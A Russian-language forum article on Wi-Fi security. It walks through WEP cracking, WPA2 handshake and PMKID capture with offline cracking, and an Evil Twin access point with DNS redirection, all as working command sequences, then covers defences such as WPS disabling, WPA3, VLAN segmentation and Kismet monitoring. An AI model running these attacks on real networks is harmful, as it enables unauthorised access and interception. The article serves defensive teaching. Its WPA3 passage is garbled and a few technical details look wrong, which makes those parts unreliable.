Статья Безопасность Wi‑Fi сетей: методы взлома WPA/WPA2 и как им противостоять

1756586103349.webp


Многие пользователи убеждены, что установка надёжного пароля — панацея от взлома Wi-Fi. На практике же злоумышленники активно эксплуатируют устаревшие протоколы и стандартные уязвимости: от мгновенного взлома WEP до перехвата WPA2-рукопожатия и атаки Evil Twin. В этой статье мы разберём, как работают основные атакующие техники, и предложим практические рекомендации по их нейтрализации в домашних и корпоративных условиях.

🔍 1. Слабые места Wi-Fi: от WEP до WPA3​

1.1 WEP и его критические уязвимости​

Протокол WEP (Wired Equivalent Privacy) признан небезопасным уже более 20 лет. Его основная проблема заключается в использовании статического ключа шифрования и слабого алгоритма RC4. В WEP каждый пакет данных шифруется с помощью одного и того же ключа, но с различными векторами инициализации (IV). Поскольку IV передаётся в открытом виде и имеет ограниченное пространство (24 бита), происходит неизбежное повторение комбинаций ключ+IV.

Злоумышленники используют эту слабость для статистического анализа: собирая достаточное количество пакетов с повторяющимися IV, они могут восстановить исходный ключ шифрования. На практике атака выполняется за 2–5 минут:

Bash:
# Запуск захвата пакетов
sudo airmon-ng start wlan0
sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -w capture

# Перебивка клиента для ускорения захвата рукопожатия
sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon

# Восстановление ключа WEP
aircrack-ng capture-01.cap

1.2 Сравнение протоколов шифрования​

Для понимания текущих угроз важно проследить развитие стандартов Wi-Fi-безопасности:
ПротоколГодАлгоритм шифрованияКлючевые особенностиОсновные уязвимости
WEP1997RC4 + статический ключПростота реализацииIV-collision; статический ключ
WPA2003RC4 + TKIPДинамические ключи; MICTKIP rainbow tables; chopchop
WPA22004AES-CCMPСтандарт IEEE 802.11i4-way handshake capture; WPS PIN
WPA32018AES + SAEЗащита от offline attacksDowngrade attacks; DragonBlood

🛡️ 1.3 Недостатки WPA/WPA2 в деталях​

WPA2, несмотря на использование криптографически стойкого AES, подвержен нескольким категориям атак:

Атаки на Pre-Shared Key (PSK): Если пароль сети состоит из распространённых слов или коротких комбинаций, его можно подобрать методом brute-force или с помощью словарных атак. Исследования показывают, что 8-символьный пароль из цифр взламывается за несколько часов на современных GPU.

Уязвимость 4-way handshake: Процесс аутентификации WPA2 основан на обмене четырьмя сообщениями между клиентом и точкой доступа. Этот обмен можно перехватить пассивно, а затем провести offline-атаку для восстановления PSK без дальнейшего взаимодействия с сетью.

WPS-эксплуатация: Wi-Fi Protected Setup использует 8-значный PIN-код, который фактически состоит из двух 4-значных частей с контрольной суммой. Это сокращает пространство перебора до ~11000 комбинаций, что делает брутфорс тривиальной задачей.

⚙️ 2. Практика атак на WPA2 и Evil Twin​

2.1 Разбор атаки на WPA2-handshake​

Теоретическая основа: WPA2 использует протокол 4-way handshake для взаимной аутентификации клиента и точки доступа, а также для генерации временных ключей шифрования. Процесс включает обмен nonce-значениями и вычисление Pairwise Transient Key (PTK) на основе PMK (производного от PSK).
Атака состоит из следующих этапов:
  1. Пассивное прослушивание: Злоумышленник переводит Wi-Fi адаптер в режим мониторинга для захвата всех 802.11 кадров:
    Bash:
    sudo airmon-ng start wlan0
    sudo airodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake
  2. Принудительное переподключение: Для захвата handshake необходимо, чтобы клиент подключился к сети. Если активных подключений нет, используется deauth-атака:
    Bash:
    # Деаутентификация конкретного клиента
    sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c BB:CC:DD:EE:FF:00 wlan0mon
    
    # Массовая деаутентификация всех клиентов AP
    sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
  3. Offline-атака на PSK: После захвата handshake проводится перебор паролей без взаимодействия с целевой сетью:
    Bash:
    # Использование словаря паролей
    aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap
    
    # GPU-ускоренная атака через Hashcat
    hashcat -m 2500 handshake.hccapx /usr/share/wordlists/rockyou.txt
Для глубокого понимания современных техник защиты и атак на WPA/WPA2 рекомендую ознакомиться с полным руководством, где описаны различные методы проведения атак, захвата рукопожатий и эффективные способы защиты.

2.2 PMKID-атака: новый вектор против WPA2​

В 2018 году исследователи обнаружили возможность извлечения PMKID (Pairwise Master Key Identifier) непосредственно из beacon-кадров или probe response, что позволяет проводить атаки без захвата handshake:
Bash:
# Захват PMKID с помощью hcxdumptool
sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1

# Конвертация в формат hashcat
hcxpcaptool -z pmkid.hash pmkid.pcapng

# Offline-перебор
hashcat -m 16800 pmkid.hash wordlist.txt

🎭 2.3 Evil Twin: социотехническая атака через поддельную AP​

Концептуальная основа: Evil Twin эксплуатирует особенности поведения клиентских устройств, которые автоматически подключаются к знакомым SSID с наиболее сильным сигналом. Злоумышленник создаёт точку доступа с идентичным именем сети (SSID), но под своим контролем.
Техническая реализация:
  1. Рекогносцировка целевой сети:
    Bash:
    # Сканирование доступных AP
    sudo iwlist wlan0 scan | grep -E "(ESSID|Signal|Encryption)"
    
    # Детальный анализ через airodump
    sudo airodump-ng wlan0mon
  2. Создание поддельной точки доступа:
    Код:
    # /etc/hostapd/evil_twin.conf
    interface=wlan1
    driver=nl80211
    ssid=Office_WiFi_5G
    hw_mode=g
    channel=6
    macaddr_acl=0
    auth_algs=1
    ignore_broadcast_ssid=0
    wpa=2
    wpa_passphrase=TemporaryPassword123
    wpa_key_mgmt=WPA-PSK
    wpa_pairwise=TKIP
    rsn_pairwise=CCMP
  3. Настройка DHCP и DNS-перехвата:
    Bash:
    # Запуск DHCP-сервера
    sudo dnsmasq --interface=wlan1 --dhcp-range=192.168.10.10,192.168.10.50,12h --no-hosts --log-queries
    
    # Перенаправление DNS-запросов на captive portal
    sudo iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.10.1:80
    sudo iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 192.168.10.1:443
Внимание: Несанкционированный доступ к чужим сетям Wi-Fi является нарушением законодательства и может повлечь за собой уголовную или административную ответственность. Информацию в статье я привел исключительно с целью помочь пользователям понять методы и механизмы атаки, чтобы лучше защитить свои сети и знать, чего стоит остерегаться. Используйте знания и инструменты только для тестирования сетей с явным разрешением владельцев.
Ради интереса можете ознакомиться с обзором прошивок PhiSiFi, EvilTwin и Captive-Portal на базе ESP8266. В статье подробно сравниваются их возможности и особенности применения в атаках Evil Twin и социальной инженерии.

🛡️ 3. Укрепление защиты Wi-Fi​

3.1 Криптографически стойкие пароли и управление ключами​

Математические принципы: Стойкость пароля определяется энтропией — количеством информации, необходимой для его угадывания. Пароль длиной L символов из алфавита размером N имеет энтропию log₂(N^L) бит. Для эффективного противодействия GPU-атакам рекомендуется энтропия не менее 60-80 бит.
Практические рекомендации:
  • Минимальная длина: 16-20 символов
  • Состав: сочетание строчных и прописных букв, цифр, специальных символов
  • Источники генерации: криптографически стойкие генераторы (openssl, /dev/urandom)

3.2 Отключение WPS и минимизация атакующих векторов​

WPS-уязвимости: Wi-Fi Protected Setup подвержен нескольким классам атак, включая Pixie Dust attack и PIN bruteforce. Даже при отключении WPS в пользовательском интерфейсе многие роутеры продолжают отвечать на WPS-запросы.

Полное отключение WPS:
Bash:
# Проверка состояния WPS через wash
wash -i wlan0mon

# В веб-интерфейсе роутера:
# Advanced Settings → Wireless → WPS → Disable
# Или через CLI (для OpenWrt):
uci set wireless.@wifi-iface.wps_pushbutton='0'
uci set wireless.@wifi-iface.wps_label='0'
uci commit wireless
wifi reload

3.3 Переход на WPA3 и новые технологии аутентификации​

Переход на протокол WPA3 — одно из самых значимых улучшений в безопасности Wi-Fi за последние годы. Теперь немного теории:
Одновременная аутентификация равных (SAE)
  • SAE, также известный как «Dragonfly Key Exchange», заменяет механизм PSK-аутентификации в WPA2. Каждый участник соединения (клиент и точка доступа) последовательно случайными числами и закрепляется зашифрованными значениями, после чего оба резервируют Pairwise Master Key (PMK) – общий секретный ключ.
  • Преимущества:
    Защита от оффлайн-брутфорса: при вводе пароля злоумышленнику необходимо активное взаимодействие с точкой доступа каждой атаки, что делает действия объектами и легко блокируемыми.
    Совершенная прямая секретность (PFS) : даже если злоумышленник позже получит долгосрочный ключ, он не сможет расшифровать сеанс сессии, поскольку для каждой сессии автоматически сядет новый временный ключ.
Предварительно общий ключ (PSK)
  • в WPA2-Personal PSK — это тот самый пароль, который вы придумываете и вводите на всех своих устройствах, чтобы подключиться к домашней или офисной сети. Он выполняет роль «мастера-ключа»: во время соединения с сетью и клиент использует его для создания временных уникальных ключей шифрования.
  • Недостатки PSK:
    – Если ваш пароль слишком простой (короткий или составленный из очевидных слов и фраз), злоумышленник может перехватить рукопожатие и перебрать его в автономном режиме, как взлом старого замка при помощи подбора ключей.
    – Поскольку все сессии происходят от одного PSK, его компрометация обнажает весь ранее зашифрованный трафик – как если бы один и тот же мастер-ключ открывал каждый замок за всю историю дома.
Совершенная прямая секретность (PFS)
PFS гарантирует, что даже если кто-то узнает ваш долгосрочный мастер-ключ, он не сможет добраться до показателя прошлых сессий. В WPA3 эта функция обеспечивает SAE: при каждом новом сеансе общения создается небольшой короткий активный ключ шифрования.​
Расширенное открытие (OWE)
В открытых сетях без пароля Enhanced Open включает уровень защиты: клиент и точка доступа открываются публичными ключами и «домашним секретом», прежде чем запускать передачу пакетов Wi-Fi, так что даже без пароля не получится спокойно прослушивать трафик.​
Защита от понижения версии (downgrade)
Злоумышленникам выгодно позволить вашему устройству «переехать» с безопасного WPA3 на уязвимый WPA2. WPA3 означает следующее: в процессе рукопожатия клиент и точка доступа предоставляют данные о подключенных протоколах, а при попытке снизить уровень безопасности соединение просто не устанавливается.​

Внедрение WPA3 и границ с этими технологиями значительно повышает устойчивость сетей Wi-Fi к современным атакам. Чтобы воспользоваться преимуществами, убедитесь, что ваше оборудование (маршрутизатор, точка доступа и клиентские устройства) поддерживает WPA3, а в системе безопасности выбран режим WPA3-Personal или WPA3-Enterprise.

3.4 Продвинутая сегментация и изоляция трафика​

Современная Wi-Fi безопасность требует не просто разделения на "основную" и "гостевую" сети, но и детальной сегментации по типам устройств и уровням доверия:

СегментVLAN IDНазначениеПолитики доступаПримеры устройств
CorporateVLAN 10Корпоративные устройстваПолный доступ к LAN/WANРабочие ноутбуки, смартфоны
GuestVLAN 20Внешние пользователиТолько интернетУстройства посетителей
IoTVLAN 30Интернет вещейОграниченный интернетIP-камеры, датчики, принтеры
ManagementVLAN 99Сетевое оборудованиеДоступ только для админовAP, коммутаторы, роутеры

📡 4. Мониторинг и обнаружение угроз​

4.1 Wireless Intrusion Detection Systems (WIDS)​

Принципы работы WIDS: Современные системы обнаружения вторжений в беспроводные сети анализируют радиоэфир в реальном времени, выявляя аномалии в поведении устройств, несанкционированные точки доступа и признаки активных атак.
Kismet — open-source WIDS:
Bash:
# Установка и настройка Kismet
sudo apt install kismet
sudo usermod -a -G kismet $USER

# Конфигурация для мониторинга нескольких каналов
echo "source=wlan0:name=monitor1" >> ~/.kismet/kismet_site.conf
echo "channel_hop=true" >> ~/.kismet/kismet_site.conf
echo "channel_hop_speed=3" >> ~/.kismet/kismet_site.conf

# Запуск с логированием подозрительных событий
kismet --daemonize --log-prefix=/var/log/kismet/security_scan
Детекция Evil Twin через анализ MAC OUI:
Kismet может выявлять поддельные точки доступа, анализируя Organizationally Unique Identifier (OUI) в MAC-адресах. Легитимные корпоративные AP обычно используют оборудование определённых вендоров.

4.2 Активный мониторинг подключённых устройств​

Автоматизация через SNMP: Большинство корпоративных точек доступа поддерживают SNMP для удалённого мониторинга. Это позволяет создавать скрипты для отслеживания новых MAC-адресов:
Python:
#!/usr/bin/env python3
from pysnmp.hlapi import *
import smtplib
from email.mime.text import MIMEText

def get_client_list(ap_ip, community='public'):
    """Получение списка подключённых клиентов через SNMP"""
    clients = []
    for (errorIndication, errorStatus, errorIndex, varBinds) in nextCmd(
        SnmpEngine(),
        CommunityData(community),
        UdpTransportTarget((ap_ip, 161)),
        ContextData(),
        ObjectType(ObjectIdentity('1.3.6.1.4.1.14988.1.1.1.2.1.1')),  # MikroTik OID
        lexicographicMode=False):
    
        if errorIndication:
            break
        elif errorStatus:
            break
        else:
            for varBind in varBinds:
                clients.append(str(varBind[15]))
 
    return clients

def send_alert(new_clients):
    """Отправка уведомления о новых подключениях"""
    msg = MIMEText(f"Обнаружены новые устройства: {', '.join(new_clients)}")
    msg['Subject'] = 'Wi-Fi Security Alert'
    msg['From'] = 'wids@company.local'
    msg['To'] = 'security@company.local'
 
    smtp = smtplib.SMTP('localhost')
    smtp.send_message(msg)
    smtp.quit()

✅ Заключение​

Миф о «надёжном пароле» не спасёт от современных атак на WPA/WPA2. Лучшая защита — комбинация длинного ключа, отключения WPS, перехода на WPA3, сегментации сети и мониторинга активности. Периодический пентест поможет своевременно обнаружить проблемы и укрепить беспроводную инфраструктуру как дома, так и в офисе. Только комплексный подход обеспечит надёжную защиту ваших данных и устройств.
 
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab